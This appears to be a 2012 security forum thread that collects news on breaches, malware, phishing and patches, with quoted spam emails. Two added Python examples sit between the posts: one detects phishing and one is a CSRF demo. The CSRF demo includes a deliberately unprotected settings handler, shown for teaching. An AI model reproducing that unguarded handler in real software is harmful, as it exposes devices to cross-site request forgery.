One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified.
We consider this vulnerability to be critical.
Read more at :
http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php
***
-
***
Data breach at IEEE.org: 100k plaintext passwords.
Using the data to gain insights into the engineering and scientific community
IEEE suffered a data breach which I discovered on September 18 (UPDATE: the breach is now confirmed). For a few days I was uncertain what to do with the information and the data. On September 24, I let them know, and they fixed (at least partially) the problem. The usernames and passwords kept in plaintext were publicly available on their FTP server for at least one month prior to my discovery. Among the almost 100,000 compromised users are Apple, Google, IBM, Oracle and Samsung employees, as well as researchers from NASA, Stanford and many other places. I did not and will not make the raw data available to anyone else
See & read more at :
http://ieeelog.com/
***
-
***
Vandals break into congressman's office, install Linux on PCs
A US congressman has been left incensed after miscreants installed Linux on computers at his campaign office, possibly trashing some data in the process. Michael Grimm, a Republican who represents a district in New York covering Staten Island and parts of Brooklyn, has slammed the weekend break-in at his offices as a "politically motivated" crime against the democratic process.
"Whoever did this, the people responsible are very ignorant [sic], and they don't understand that this is not just an attack against me or my campaign," Grimm told the Staten Island Advance. "This is an attack against a federal campaign office, which is an attack on our democracy as a whole. It's an attack against what we stand for, for free elections."
Read more at :
http://www.theregister.co.uk/2012/09/26/vandals_install_linux_on_congressman_office_computers/
***
-
***
FBI Warns Of Scams Targeting Financial Industry
Criminals are using phishing e-mails, keystroke loggers, and Remote Access Trojans to steal financial employee login credentials
The financial industry is being hit by a spate of cyberattacks designed to steal employee login credentials, government and industry officials warned last week.
A joint alert (PDF) issued by the FBI, the Financial Services Information Sharing and Analysis Center (FS-ISAC), and the Internet Crime Complaint Center (IC3) states that criminals are using spam and phishing e-mails, keystroke loggers, and Remote Access Trojans (RAT) to compromise financial institution networks and obtain employee login credentials.
Read more at :
http://www.darkreading.com/insider-threat/167801100/security/news/240007804/fbi-warns-of-scams-targeting-financial-industry.html
***
-
***
Another Critical Security Flaw In Java Appears Before Oracle Has Even Resolved The Last One
On Tuesday, security researchers at the Polish firm Security Explorations revealed another critical security flaw in Java that affects users of every browser that runs the plugin, including Chrome, Firefox, Safari and Internet Explorer, allowing malicious hackers to gain complete control of a victim's machine through a rigged website. And unlike the bug in Java 7 that was actively exploited by hackers to install malware on users' machines until it was patched at the end of last month (also first spotted by Security Explorations four months earlier), this security flaw also affects older versions of Java including Java 5 and Java 6. That means more than a billion users are affected, according to Oracle's count of desktop computers running the software.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/09/25/another-critical-security-flaw-in-java-appears-before-oracle-has-even-resolved-the-last-one/
***
-
***
Espionage Hackers Target ‘Watering Hole’ Sites
Security experts are accustomed to direct attacks, but some of today’s more insidious incursions succeed in a roundabout way — by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called “watering hole” tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.
Some of the earliest details of this trend came in late July 2012 from RSA FirstWatch, which warned of an increasingly common attack technique involving the compromise of legitimate websites specific to a geographic area which the attacker believes will be visited by end users who belong to the organization they wish to penetrate.
Read more at :
http://krebsonsecurity.com/2012/09/espionage-hackers-target-watering-hole-sites/
And related to the above, please read :
http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/240007959/vast-cyberespionage-campaign-brazen-in-its-approach.html?nomobile=1
***
-
***
Security Firm Identifies Top Words Used in Spear-Phishing Attacks
Time and time again, social engineering has shown itself to be one of the most effective tactics attackers use to defeat enterprise security.
In a new research paper, security firm FireEye has identified the most common social engineering techniques used in spear-phishing attacks targeting enterprises. In an analysis of the threat landscape last month, Symantec reported the global phishing rate in August increased slightly to roughly one in 312.9 emails that contained some sort of phishing attack.
Read more at :
http://www.eweek.com/security/security-firm-identifies-top-words-used-in-spear-phishing-attacks/?kc=EWKNLEDP09272012B
***
-
Security Advisory: Upcoming Revocation of Adobe code signing certificate
http://www.adobe.com/support/security/advisories/apsa12-01.html
http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html
-
New ExploitShield app says it will protect against unknown zero-day exploits; freeware for consumers and non-profits. Corporate versions still under development.
Still in beta.
http://download.cnet.com/8301-2007_4-57521983-12/exploitshield-appears-to-live-up-to-its-name/
Possibly new category of antimalware protection. (Anti-exploit.)
-
***
Facebook's Next Privacy Issue & How To Opt Out
In what is likely to become the next privacy controversy for Facebook, the social-media giant is working with a big-data firm to correlate off-line purchases with ad views on Facebook.
And, surprise, opting out is trickier than Facebook’s typically difficult procedures.
The advocacy group Electronic Frontier Foundation report didn't make clear how long Facebook has had access to the data, which will help Facebook understand how ads on the social network impact real-world purchases. Being able to do so would make the social network more popular with advertisers.
Read more, including how to Opt Out, at:
http://www.readwriteweb.com/archives/heres-how-to-opt-out-of-one-of-facebooks-biggest-privacy-intrusions.php
***
-
***
In cyberattacks, hacking humans is highly effective way to access systems
The e-mails arrived like poison darts from cyberspace.
Some went to the Chertoff Group, a national security consulting firm in Washington. Others targeted intelligence contractors, gas pipeline executives and industrial-control security specialists. Each note came with the personal touches of a friend or colleague.
“Attach[ed] is a quote for the Social Media training we discussed,” said one message sent on July 3 to the vice president of EnergySec, a federally funded group in Oregon that focuses on the cybersecurity of the nation’s power grid.
But like much of the digital universe, the e-mails were not what they seemed. They were cyberweapons, part of a devastating kind of attack known as “social engineering.” Emerging details about the e-mails show how social engineering — long favored by con artists, identity thieves and spammers — has become one of the leading threats to government and corporate networks in cyberspace.
Read much more at :
http://www.washingtonpost.com/investigations/in-cyberattacks-hacking-humans-is-highly-effective-way-to-access-systems/2012/09/26/2da66866-ddab-11e1-8e43-4a3c4375504a_story.html
***
-
***
Real spam email to malware site appears to come from the LinkedIn site.
An example is below.
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes.co... [Add to Address Book]
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Subject: There are a total of 1 messages awaiting your response
Date: Sep 30, 2012 5:51 AM
LinkedIn
REMINDERS
Invitation reminders:
• From linkedin.com (a person's name here)
PENDING MESSAGES
• There are a total of 1 messages awaiting your response. Visit your InBox.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user
without your permission. © 2012, LinkedIn Corporation.
The above links are not active.
Avast does block this if you should click on the real links in the real email, with a "Malicious URL Detected" warning.
All links take you to hXXp://canadapharmacytoronto.com/ instead of to LinkedIn.
***
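The post above spots the two tells of this kind of mail by eye: the sender is in a domain that merely starts with "linkedin", and every link goes to a pharmacy site rather than linkedin.com. As an added illustration (not from the post or from Avast), here is the same check done in code over a constructed message modelled on the one quoted; the only page-derived values are the sender and link hosts, everything else is made up.

```python
"""Flag a brand-impersonation e-mail by the two tells in the post above:
a From: domain that is not the brand's, and links whose real target host
is not the brand's either. Added example; the message is constructed and
modelled on the post (the sender and link hosts are the ones quoted there).
"""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample; not the original message
SAMPLE_EMAIL = """\
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes.co>
To: victim@example.invalid
Subject: There are a total of 1 messages awaiting your response
Content-Type: text/html; charset=utf-8

<html><body>
<p>There are a total of 1 messages awaiting your response.
<a href="http://canadapharmacytoronto.com/inbox">Visit your InBox</a>.</p>
<p>Don't want to receive email notifications?
<a href="http://canadapharmacytoronto.com/settings">Adjust your message settings</a>.</p>
<p>From <a href="https://www.linkedin.com/">linkedin.com</a></p>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Last two labels ('linkedin.attunes.co' -> 'attunes.co').
    A real tool would consult the public-suffix list; this is an assumption."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def analyse(raw_message, brand_domain="linkedin.com"):
    """Return human-readable findings; an empty list means nothing mismatched."""
    msg = message_from_string(raw_message)
    _name, addr = parseaddr(msg.get("From", ""))
    sender_domain = registrable_domain(addr.rpartition("@")[2])
    findings = []
    if sender_domain != brand_domain:
        findings.append(f"sender domain {sender_domain} is not {brand_domain}")
    charset = msg.get_content_charset() or "utf-8"
    body = msg.get_payload(decode=True).decode(charset, errors="replace")
    collector = LinkCollector()
    collector.feed(body)
    for href, text in collector.links:
        host = urlparse(href).hostname or ""
        if registrable_domain(host) != brand_domain:
            findings.append(f"link '{text}' -> {host or '(no host)'}")
    return findings
```

Note that the check looks at the registrable domain, not at whether the hostname contains the brand name: "linkedin.attunes.co" is owned by whoever registered attunes.co, which is exactly the trick this mail relies on. The same logic is what a mail gateway rule or a user-training example can be built around, and it complements rather than replaces the advice later in the thread to type the site's address yourself instead of clicking.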
-
***
Real spam email to malware site appears to come from the LinkedIn site.
An example is below.
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes.co... [Add to Address Book]
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Subject: There are a total of 1 messages awaiting your response
Date: Sep 30, 2012 5:51 AM
LinkedIn
REMINDERS
Invitation reminders:
• From linkedin.com (a person's name here)
PENDING MESSAGES
• There are a total of 1 messages awaiting your response. Visit your InBox.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user
without your permission. © 2012, LinkedIn Corporation.
The above links are not active.
Avast does block this if you should click on the real links in the real email, with a "Malicious URL Detected" warning.
All links take you to hXXp://canadapharmacytoronto.com/ instead of to LinkedIn.
***
If you're using Gmail, these messages are automatically placed in the spam folder.
-
Generally I lump these in with the "warnings" about account problems from banks I've never done business with, or supposed failed-delivery notices from UPS and the like. Other than the odd forum here and there, I'm not a registered member of any social or business organization on the net (other than my ISP and Yahoo, that is), so I know without doubt such mail is just garbage.
-
If you're using Gmail, these messages are automatically placed in the spam folder.
True, and a better idea is, no matter whether an email is suspect or not, just don't click links you receive in it. If you got an email from LinkedIn, just head directly to the LinkedIn website to see if you really have a message or not rather than clicking links in the email; same for Facebook etc.
-
Miley Cyrus Fans, be careful, and stay safe. (http://www.hotforsecurity.com/blog/yet-another-miley-cyrus-sex-tape-kicks-tagjacking-back-into-shape-authentication-tokens-snatched-through-copypaste-code-classic-3689.html?goback=%2Egde_1003727_member_170568013)
"A Facebook post made to resemble a breaking news announcement about a Miley Cyrus sex tape brings tagjacking back into the social scam spotlight."
-
***
***
Real spam email to malware site appears to come from the LinkedIn site.
An example is below.
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes.co... [Add to Address Book]
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Subject: There are a total of 1 messages awaiting your response
Date: Sep 30, 2012 5:51 AM
LinkedIn
REMINDERS
Invitation reminders:
• From linkedin.com (a person's name here)
PENDING MESSAGES
• There are a total of 1 messages awaiting your response. Visit your InBox.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user
without your permission. © 2012, LinkedIn Corporation.
The above links are not active.
Avast does block this if you should click on the real links in the real email with a "Malicious URL Detected" warning.
All links take you to hXXp://canadapharmacytoronto.com/ instead of to LinkedIn.
***
If you're using Gmail, these messages are automatically placed in the spam folder.
It does not matter what email spam filter you are using be it what Gmail uses, what any other email program uses, or those who use independent email spam filters. Not everyone uses Gmail, thankfully, because there are better email services, IMHO. And, having a variety of email services is good for the business just as it is good to have more than one OS company, more than one CPU maker, more than one browser producer, more than one AV company, etc.
In my own email service, I have the spam filter set at medium so that it does not block some things I want to receive that would otherwise be blocked by the high setting. I like the ability to decide what email I want or do not want.
This one slipped through and I'm glad it did. This way, I could investigate it, warn LinkedIn about it as it could have come from a compromised LinkedIn account, and finally, warn others who are LinkedIn members who are either on this forum as members or as visitors. Not everyone who visits this forum, Bob, is an Avast user ... nor are all of them Gmail users and probably do not want to be.
By the way, what I sent to LinkedIn was the complete email without the obvious changes I made in my post here and I have already gotten a thank you from LinkedIn for notifying them about the problem account.
***
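The two tell-tales in the message quoted above are the sender address that only looks like LinkedIn and the links that all leave for another site. The check below is an added example for this thread (not code from the post, from Avast or from LinkedIn) that pulls both indicators out of a raw message with the standard library. The sender domain in the sample is a constructed placeholder because the post truncates the real one, and BRAND_DOMAINS is an assumed local allow-list; the landing host is the one the post names.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample modelled on the headers and links quoted in the thread.
# The post truncates the real sender domain, so an obviously fake placeholder
# domain is used here; the landing host is the one the post names.
SAMPLE_EMAIL = """\
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes-placeholder.invalid>
To: recipient@example.invalid
Subject: There are a total of 1 messages awaiting your response
Date: Sun, 30 Sep 2012 05:51:00 -0400
Content-Type: text/html; charset=utf-8

<html><body>
<b>LinkedIn</b> REMINDERS<br>
<a href="http://canadapharmacytoronto.com/?ref=inbox">Visit your InBox</a><br>
<a href="http://canadapharmacytoronto.com/settings">Adjust your message settings</a>
</body></html>
"""

# Brand keyword (as it shows up in display names) -> domains that legitimately
# send mail for that brand. Assumption: a real deployment keeps this in policy.
BRAND_DOMAINS = {"linkedin": {"linkedin.com"}}

HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def under(host, domain):
    """True if host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def analyze(raw_message):
    """Return a dict of phishing indicators for one RFC 5322 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    sender = msg["From"].addresses[0]
    display = sender.display_name.lower()
    sender_host = sender.domain.lower()

    report = {"brand": None, "sender_domain_mismatch": False,
              "lookalike_sender": False, "foreign_link_hosts": []}

    brand = next((b for b in BRAND_DOMAINS if b in display), None)
    report["brand"] = brand
    if brand is None:
        return report          # no brand claimed, nothing to cross-check
    legit = BRAND_DOMAINS[brand]

    # 1. The display name claims a brand the sender address does not belong to.
    if not any(under(sender_host, d) for d in legit):
        report["sender_domain_mismatch"] = True
        # 2. The brand name is used as a left-hand label of some other
        #    registrable domain ("linkedin.<something-else>"), a classic lookalike.
        report["lookalike_sender"] = brand in sender_host.split(".")[:-2]

    # 3. Every link should land on the brand's own domains; collect those that don't.
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body is not None else ""
    hosts = {(urlparse(u).hostname or "").lower() for u in HREF_RE.findall(html)}
    report["foreign_link_hosts"] = sorted(
        h for h in hosts if h and not any(under(h, d) for d in legit))
    return report


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```

Nothing here follows a link; the message is only parsed, which is the point of the advice given later in the thread: decide from the headers and link targets, then go to the real site by typing its address rather than clicking.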
-
***
Team GhostShell Exposes 120,000 Records From Universities - Dark Reading
Calculated attacks turn up hundreds of thousands of vulnerable records at 100 universities across the globe, hacker group says
The hacktivist group TeamGhostShell says it has embarked on a new campaign to expose data and vulnerabilities at 100 of the top universities around the world.
In a posting on Pastebin Monday, TeamGhostShell released some 120,000 records from universities such as Oxford and Harvard. The campaign, which the group has dubbed "Project WestWind," has revealed vulnerabilities in university systems that could put hundreds of thousands more records at risk, the group says.
Read more at :
http://www.darkreading.com/identity-and-access-management/167901114/security/attacks-breaches/240008262/team-ghostshell-exposes-120-000-records-from-universities.html
***
-
***
DSL modem hack used to infect millions with banking fraud malware
Even when PCs are locked down, modems and routers can still be compromised.
Millions of Internet users in Brazil have fallen victim to a sustained attack that exploited vulnerabilities in DSL modems, forcing people visiting sites such as Google or Facebook to reach imposter sites that installed malicious software and stole online banking credentials, a security researcher said.
The attack, described late last week during a presentation at the Virus Bulletin conference in Dallas, infected more than 4.5 million DSL modems, said Kaspersky Lab Expert Fabio Assolini, citing statistics provided by Brazil's Computer Emergency Response Team. The CSRF (cross-site request forgery) vulnerability allowed attackers to use a simple script to steal passwords required to remotely log in to and control the devices. The attackers then configured the modems to use malicious domain name system servers that caused users trying to visit popular websites to instead connect to booby-trapped imposter sites.
See & read more at :
http://arstechnica.com/security/2012/10/dsl-modem-hack-infects-millions-with-malware/
***
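The weakness the article describes is an admin page that applies a settings change to the modem from any page the victim's browser happens to be on. The snippet below is an added example for this thread (constructed; not any vendor's firmware and not code from the article) showing that unguarded "before" shape next to the usual fix: no state change on GET, an Origin/Referer check against the device's own hostnames, and a per-session synchronizer token compared in constant time. DEVICE_HOSTS, the request dictionaries and the IP addresses are all assumptions for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Hostnames/addresses under which the gateway serves its own admin pages.
# Assumption for this example; a real device knows its own LAN address.
DEVICE_HOSTS = {"192.168.1.1", "modem.local"}


def new_session():
    """Per-session record. The CSRF token lives here and in the device's own
    form, never in a cookie, so another page cannot make the browser send it."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def csrf_token_field(session):
    """Hidden-input value the device embeds in its own settings form."""
    return session["csrf_token"]


def vulnerable_set_dns(request, config):
    """'Before' shape of the hole the article describes (constructed): whatever
    reaches the handler is applied, including a request the victim's browser
    was made to send by a page on some other site."""
    config["dns"] = request["form"]["dns"]
    return 200


def origin_allowed(request):
    """Browsers attach Origin (or at least Referer) to cross-site form posts.
    Reject posts that come from another site and fail closed if neither
    header is present."""
    src = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not src:
        return False
    return urlsplit(src).hostname in DEVICE_HOSTS


def hardened_set_dns(request, session, config):
    """Same action, guarded by method check, origin check and synchronizer token."""
    if request["method"] != "POST":
        return 405                      # never change state on GET
    if not origin_allowed(request):
        return 403
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return 403                      # token missing or wrong
    config["dns"] = request["form"]["dns"]
    return 200


def demo():
    """Replay one legitimate save and one cross-site save against both handlers."""
    session = new_session()
    legitimate = {
        "method": "POST",
        "headers": {"Origin": "http://192.168.1.1"},
        "form": {"dns": "203.0.113.53", "csrf_token": csrf_token_field(session)},
    }
    # Cross-site request: submitted from a page on another origin, so the
    # browser sends the victim's cookies but a foreign Origin and no token.
    cross_site = {
        "method": "POST",
        "headers": {"Origin": "http://other-site.invalid"},
        "form": {"dns": "198.51.100.66"},
    }
    weak, strong = {"dns": "192.0.2.1"}, {"dns": "192.0.2.1"}
    return {
        "vulnerable_cross_site": vulnerable_set_dns(cross_site, weak),
        "hardened_cross_site": hardened_set_dns(cross_site, session, strong),
        "hardened_legit": hardened_set_dns(legitimate, session, strong),
        "weak_dns_after": weak["dns"],
        "strong_dns_after": strong["dns"],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The token check alone would already defeat the cross-site post; the origin check is kept as a second, independent layer because a token leak (for example through a reflected page) would otherwise be enough. On the consumer side the practical mitigations the article implies still apply: change the default admin password, keep remote administration off the WAN side, and check that the resolvers the modem hands out are the ISP's.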
-
***
New Android Malware Is A Burglar's Best Friend
PlaceRaider, an experimental smartphone trojan designed by Indiana University and the U.S. Navy, hijacks a user's phone to make detailed 3D models of their bedrooms and offices.
Newly released malware PlaceRaider sounds like science fiction: It's Android malware designed to build 3-D models of users' apartments for burglars and assassins. But PlaceRaider--developed by a team at Indiana University--is very real. The new malware was built as an academic exercise, and it exposes security flaws that government agencies would love to use. More importantly, it also exposes unintended mobile functionality that large companies like Google could easily monetize.
PlaceRaider, which was summarized in a recent arXiv paper, is a piece of “visual malware” which uses smartphone cameras, accelerometers, and gyroscopes to reconstruct victims' rooms and offices. The trojan runs in the background of any phone running Android 2.3 or above, and is hidden in a photography app that gives PlaceRaider the necessary permissions to access the camera and upload images. Once installed, PlaceRaider quietly takes pictures at random that are tagged with the time, location, and orientation of the phone. PlaceRaider also, of course, mutes the phone's shutter sound.
Read more at :
http://www.fastcompany.com/3001699/new-android-malware-burglars-best-friend
***
-
***
Spam Email With Malware Attached
This one was blocked for me but be aware if you receive one
From: EarthLink Support <support@earthlink.net>
To: charleyo3@cccccccccc
Subject: EarthLink Virus Blocker Alert: Message from "American Airlines" <sign-ids793@aa.com> Quarantined
Date: Oct 4, 2012 10:49 PM
**************************************
EARTHLINK VIRUS BLOCKER MESSAGE STATUS
**************************************
MESSAGE QUARANTINED
Virus Detected: CMU-201209-1348558767
Message Details:
From: "American Airlines" <sign-ids793@aa.com>
Subject: Your ticket
Date: Thu, 4 Oct 2012 23:41:37 -0300 (BRT)
For your protection, EarthLink Virus Blocker has quarantined a message sent to you because it contains a virus.
Note: We do not recommend that you view a message that has a virus attached, even if you have up-to-date antivirus software. However, if you choose to view it anyway, you can: Sign in to Web Mail (https://webmail.earthlink.net), then click the Virus Blocker folder on the left.
Sincerely,
EarthLink Support
By the way, I have never flown on AA.
***
-
***
Government Agencies Get Creative In APT Battle
Strapped for cash and feeling pinched by the increase in targeted attacks, some federal agencies are coming up with their own solutions for better protecting their information
SANS National Cybersecurity Conference -- BALTIMORE, MD. -- A handful of security professionals at the U.S. Department of Energy's laboratories were getting weary of trying to repel advanced persistent threat (APT)-type attacks and keep up with the latest threats. So they decided to roll their own tool to automate intelligence-sharing among the agency's national labs and scores of smaller labs.
"A couple of us were basically tired of losing [the race to keep up with new threat intelligence], so we decided we were going to do something about it. We were tired of getting together in little rooms" to share information, said Matt Myrick, senior cybersecurity engineer at DOE's Lawrence Livermore Laboratory, in a presentation here today. So Myrick and a handful of colleagues from Sandia Labs, Los Alamos Labs, and DOE's Pantex plant wrote a Python-based tool to block malicious websites, hashes, spear-phishing attacks. The so-called Master Block List (MBL) runs on an Apache server and can be integrated with any application to share real-time threat data.
Read more at :
http://www.darkreading.com/threat-intelligence/167901121/security/news/240008438/government-agencies-get-creative-in-apt-battle.html
***
-
***
"I am calling you from Windows": A tech support scammer dials Ars Technica
Cold caller from "Windows Technical Support" asks for remote access to my PC.
When the call came yesterday morning, I assumed at first I was being trolled—it was just too perfect to be true. My phone showed only "Private Caller" and, when I answered out of curiosity, I was connected to "John," a young man with a clear Indian accent who said he was calling from "Windows Technical Support." My computer, he told me, had alerted him that it was infested with viruses. He wanted to show me the problem—then charge me to fix it.
This scam itself is a few years old now, but I had not personally received one of the calls until yesterday—the very day that the Federal Trade Commission (FTC) announced a major crackdown on such "boiler room" call center operations. The very day that six civil lawsuits were filed against the top practitioners. The very day on which I had just finished speaking with Ars IT reporter Jon Brodkin, who spent the morning on an FTC conference call about this exact issue. And here were the scammers on the other end of the line, in what could only be a cosmic coincidence.
See & read much more at :
http://arstechnica.com/tech-policy/2012/10/i-am-calling-you-from-windows-a-tech-support-scammer-dials-ars-technica/
***
-
Microsoft Security Bulletin Advance Notification for October 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-oct
-
Undetectable rootkit making the rounds. TDSS/TDL4 malware infecting the MBR; see the write-up here: https://blog.damballa.com/archives/1810
Kudos for the discussion there go to Damballa Labs' Manos Antonakakis, Jeremy Demar, Kevin Stevens and David Dagon. Infected machines are used for click fraud. Would be interesting to know if ZeroVulnerability's Exploit Shield protects against this infection?
polonus
-
***
Skype Worm Spreads Ransomware, Botnet Links
Security researchers are warning Skype users about an ongoing attack that dupes people into loading a link that spreads malware.
... the attack has resulted in infected users spamming their contact lists with messages in both English and German. The English version of the message states: "lol is this your new profile pic?" along with a URL. The message in German is similar.
In both cases, the shortened URL eventually redirects to a download on hotfile.com that pulls down an archive named "Skype_todaysdate.zip" containing a single executable file of the same name.
Read more at :
http://www.eweek.com/security/skype-worm-spreads-ransomware-botnet-links/?kc=EWKNLEDP10102012B
***
-
The results of testing of antivirus products for the treatment of active infection (October 2012)
http://translate.google.ru/translate?sl=ru&tl=en&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Fwww.anti-malware.ru%2Fmalware_treatment_test_2012
-
JavaScript Worm on Steroids
Symantec blog here: http://www.symantec.com/connect/blogs/javascript-worm-steroids !!!
-
Security Vulnerability in Firefox 16
http://blog.mozilla.org/security/2012/10/10/security-vulnerability-in-firefox-16/
-
Firefox 16.0.1 is available and should fix the problem!
-
Japanese malware will put an innocent computer user in jail!
http://www.symantec.com/connect/blogs/malware-dubbed-remote-control-virus-japanese-media-used-make-death-threats-japan
-
***
New computer virus targets Venezuelans after vote
A newly detected computer virus aims to steal Venezuelans' online credentials using a link that purports to reveal information about the country's recent presidential election, the digital security company Kaspersky Lab said on Friday.
The malicious software was launched after Venezuela's Oct. 7 presidential election and was spread by email, said Dmitry Bestuzhev, head of the Moscow-based company's research and analysis team in Latin America.
At least 75 Kaspersky customers came under attack by the malware, and non-customers surely did, too, he said.
Bestuzhev said in a blog post on Friday that the malicious file is named "listas-fraude-electoral.pdf.exe," which translates as "electoral fraud lists" — a title likely to make some Venezuelans curious after President Hugo Chavez's re-election victory.
Read more at :
http://my.earthlink.net/article/tec?guid=20121012/46cc37a8-964a-4c93-9946-8aa790aad6ea
***
-
***
Cyberthieves loot $400,000 from city bank account
Cybertheft comes just days after RSA issued a warning that criminal gang planned massive attacks against U.S. banking customers
Burlington, Wash. officials have notified hundreds of employees and residents that their bank account information was compromised last week when hackers broke into city systems and stole more than $400,000 from a city account at Bank of America.
Among those impacted by the breach are employees participating in Burlington's electronic payroll deposit program and utility customers enrolled in the city's autopay program for sewer and storm drain charges.
In an alert issued this morning, city administrator Bryan Harrison said all autopay customers should assume that their name, bank account number and routing number was compromised following an intrusion into a city utility billing system.
I am glad I do not use Bank of America. This is the third time this year they have been compromised which shows a lack of proper Internet security on the bank's part.
Read more at :
http://www.computerworld.com/s/article/9232372/Cyberthieves_loot_400_000_from_city_bank_account
***
-
***
Windows 7 malware infection rate soars in 2012
But 2009 OS still 2X-3X less likely to get hacked than 11-year-old XP
Windows 7's malware infection rate climbed by as much as 182% this year, Microsoft said today.
But even with that dramatic increase, Windows 7 remained two to three times less likely to fall to hacker attack than the aged Windows XP.
Data from Microsoft's newest twice-yearly security report showed that in the second quarter of 2012, Windows 7 was between 33% and 182% more likely to be infected by malware than in the second quarter of 2011.
"This may be caused in part by increasing acceptance and usage of the newest consumer version of Windows," said Microsoft in its latest Security Intelligence Report. "Early adopters are often technology enthusiasts who have a higher level of technical expertise than the mainstream computing population. As the Windows 7 install base has grown, new users are likely to possess a lower degree of security awareness than the early adopters and be less aware of safe online practices."
But other elements came into play, argued Tim Rains, director of Microsoft's Trustworthy Computing group.
Read more at :
http://www.computerworld.com/s/article/9232188/Windows_7_malware_infection_rate_soars_in_2012?source=toc
***
-
***
Microsoft patches 20 bugs, including critical Word flaw
Microsoft today patched 20 vulnerabilities in Word, Office, Windows, SharePoint Server, SQL Server and other products in its portfolio, including a critical bug in the company's popular Word program and another already used to attack the company's own online services.
Of Tuesday's seven security updates, one was labeled "critical," Microsoft's most-severe threat ranking, while the others were pegged as "important," the next-most-serious rating.
The critical update for Word affected all versions of Microsoft's word processor on Windows, including Word 2003, 2007 and 2010; Word Viewer, the add-on that lets users who don't own Word view and print documents; and Office Web Apps, the free online editions of Word, Excel, PowerPoint and OneNote.
Read more at :
http://www.computerworld.com/s/article/9232207/Microsoft_patches_20_bugs_including_critical_Word_flaw?source=toc
***
-
***
Mozilla yanks Firefox 16 one day after release
Critical vulnerability overlooked or introduced by previous patching; fix due Thursday
Mozilla yesterday took the unusual step of yanking Firefox 16 from distribution just a day after its release.
The company said a critical vulnerability triggered the move.
The bug was apparently overlooked by Mozilla while it was developing Firefox 16, or introduced by the fixes baked into the upgrade that started reaching users early Tuesday.
"Mozilla is aware of a security vulnerability in the current release version of Firefox (version 16). Firefox version 15 is unaffected," said Michael Coates, Mozilla's director of security assurance, in a Wednesday post to the company's security blog.
Read more at :
http://www.computerworld.com/s/article/9232282/Mozilla_yanks_Firefox_16_one_day_after_release?source=toc
***
-
***
Facebook connects with AVAST to protect users
AVAST Software has teamed up with Facebook to help you and your friends stay safe. AVAST is sharing its Virus Lab data with Facebook in the combined attempt to prevent malware being shared unknowingly by Facebook users. Whenever someone clicks a link within Facebook, Facebook checks the URL in the AVAST cloud, in real time. If the URL is infected, the user sees a message warning of the potential threat.
Read more at :
http://blog.avast.com/2012/10/16/facebook-connects-with-avast-to-protect-users/
***
-
Santander's online banking keeps passwords in cookies
http://www.h-online.com/security/news/item/Santander-s-online-banking-keeps-passwords-in-cookies-Update-1730364.html
-
Unbelievable!
-
***
That is a terrible practice but I would bet more banks than you would think do the same thing.
***
-
***
Cyber-Security Threats Unaddressed by Small Businesses
Small-business owners are woefully unprepared when it comes to protecting their companies from various forms of internal and external security threats.
When it comes to security, small and midsize businesses are largely unaware of the risks they face, according to a survey of 1,015 U.S. SMBs by the National Cyber Security Alliance (NCSA) and security specialist Symantec. The report found more than three-fourths (77 percent) of respondents said their company is safe from cyber-threats, such as hackers, viruses, malware or a cyber-security breach, yet 83 percent have no formal cyber-security plan.
One encouraging finding was that companies founded in the wake of the economic crisis are almost 20 percent more likely than older small businesses to have a written plan in place for keeping their business secure from cyber-threats.
Read more at :
http://www.eweek.com/security/cyber-security-threats-unaddressed-by-small-businesses-symantec/?kc=EWKNLEDP10182012D
***
-
The Biggest Troll on the Web
http://gawker.com/5950981/unmasking-reddits-violentacrez-the-biggest-troll-on-the-web
